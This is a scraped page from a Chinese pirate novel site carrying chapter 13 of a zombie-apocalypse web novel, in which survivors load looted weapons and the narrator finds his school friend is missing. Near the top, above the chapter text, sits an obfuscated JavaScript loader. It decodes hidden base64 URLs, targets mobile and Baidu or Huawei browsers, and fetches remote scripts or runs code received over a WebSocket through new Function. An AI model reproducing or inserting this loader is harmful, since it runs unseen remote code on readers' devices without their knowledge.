笔趣阁

字:
关灯 护眼
笔趣阁 > 腥红计划 > 第十三章 不速之客?
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第十三章 不速之客?

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
我和唐欣雨合力扛了两箱步枪到车上,而老朱只顾着抬他看上的那一架轻机枪和重机枪,然后满库的找子弹。
  平时懒惰成性的老朱连袜子都不愿意花力气洗,这次却不用我们帮忙,硬生生自己抬了两箱子弹!
  而刘韬却不知道在找什么,一直在瞎转悠,转了半天手上还是空荡荡的。
  “刘韬,你在找什么哦?我们都搬得差不多了。”
  “这些都是步枪手枪,我想要一把好一点狙击枪。”
  “你不早说,我刚刚在那边的角落看见一个箱子上面写了狙击枪……”
  还没说完,刘韬就急急忙忙向我指着的方向跑了过去。
  我和唐欣雨相视一笑摇了摇头。
  这两个人真是的,有点武痴的样子,看着自己喜欢的武器口水都要流了下来。
  老朱搬完自己想要的武器,又折返回来搬作战服头盔啥的,嘴上叼着一根烟,嘴角微微上扬,哼着小曲,意气风发!
  “嚯!”
  刘韬惊叫一声,把我们注意力都吸引了过去。
  我和唐欣雨赶忙走过去弄清楚发生了什么。
  可是什么事也没有,不过是他打开了几个木箱子的狙击枪。
  “这有什么好大惊小怪的?”
  “不不不,你看!”刘韬从一个木箱子里抓起一把狙击枪,“这是88式狙击枪,那一把是97式狙击步枪,另外一把是AMR-2大口径重型狙击步枪,可以用老朱那把重机枪的子弹!”
  “来来来帮我搬一下,我全要了!”
  我真的是无奈,枪好是好,要这么多干啥呀,反正不管什么枪一枪爆头,是人是丧尸都得死。
  不过我也没有打击他,还好我帮他搬了这么几把不同类型的狙击枪,后面的事实证明刘韬是对的。
  整整搬了两个半小时,因为车子的空间有限,我们舍弃了很多目前不是非常需要的武器,回到车上,抽着烟休息着,而老朱却还是捧着那挺轻机枪爱不释手,刘韬也差不多,一直在调试着倍镜。
  只有我和唐欣雨稍微正常一点,试了试战术手套,感觉不错,有较强的包裹性,防滑防寒,却不显得厚重,可以轻易捏起钉子。
  这次我们虽然舍弃了很多武器,但是收获也不错了,我们也不需要那么多武器。
  有老朱的两把机枪,两箱95式突击步枪,八把手枪,一箱手雷,一箱闪光弹,六套作战服及一些配套的装备,还有几箱子弹……
  启动汽车,突然增加了如此大的重量,都可以明显感觉到汽车开动起来有些吃力,尤其是到了别墅门口的土坡前,车子重重吐了一口尾气才冲了上去。
  到家已经是傍晚了,女人们在厨房忙活着,小孩在客厅玩着游戏,男人们在屋外做着测量,他们打算修建一个围墙,以此提高我们防御丧尸攻击的能力。
  我们三个则瘫坐在沙发里,抽着烟等菜上桌。
  今晚要好好喝一顿!
  酒菜全部上桌,一杯杯啤酒下肚,一天的紧张疲劳瞬间消失不见。
  酒足饭饱,我们坐在沙发上面看新闻。
  到现在幸运的是,自来水没断,电也没断,网络也没断,看来这些重要的地方还是守住了。
  新闻无非就是报道那些地方又变成了新的沦陷城市,特别是寒国,半个国家已经沦陷,正在向联合国申请救援,但这个时候哪个国家还有余力去帮助其他国家呢?自己都已经应接不暇了……
  新闻的末尾是记者在前线冒险报道天河市的感染情况,记者随机采访了身后一个慌慌张张的中年男人。
  “先生,请问你相信政府和军队吗?”
  “唐湘杰!你到底去哪里了!知不知道我和妈妈都在找你啊!如果你能看到就赶紧回家,我们会一直在家里等你……”
  唐湘杰?!
  唐湘杰不是我高中同桌,我高中最好的那个朋友吗?仔细看了看那个中年男人,虽然比之前见到的时候苍老了许多,但是还是能认出来是唐湘杰的爸爸,所以……唐湘杰失踪了?
  我立即给唐湘杰拨了个电话,电话那头是关机状态。
  出事了?
  我本来还有点眩晕,瞬间清醒了过来,想着任何有可能的情况。
  刘韬看着我的反应就询问我发生了什么,我跟他讲了后,他也陷入沉思。
  刘韬虽然跟唐湘杰也认识,但是并不是很熟,还是通过我的生日聚会认识的。
  “你先看看他QQ空间和朋友圈,看看有没有最近两天发的。”
  对呀,可以看看有没有定位!
  点开他的QQ头像,进入空间,最近的一条是六月二十五,而今天已经是七月二十三,快一个月了。
  又点开他的朋友圈,朋友仅展示三天的朋友圈,还好有最近的一条。
  点开,时间∶7月21日,地点∶长安不夜古城。
  下面是一张自拍照,照片显示,他应该是住在张安不夜古城的天子酒店。
  而上次我看新闻好像听见主持人说那边已经出现了感染者,电力被破坏,所以唐湘杰可能就是因为这样所以没电充手机。
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师